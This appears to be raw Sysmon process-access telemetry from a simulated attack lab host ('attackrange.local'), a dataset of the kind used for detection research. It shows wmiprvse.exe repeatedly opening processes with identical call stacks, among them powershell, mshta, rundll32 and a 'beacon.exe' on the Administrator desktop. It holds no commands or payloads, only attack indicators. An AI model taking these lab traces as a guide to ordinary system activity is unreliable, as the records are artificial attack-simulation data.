16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.673{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.672{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.672{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.670{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.670{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.669{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.668{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 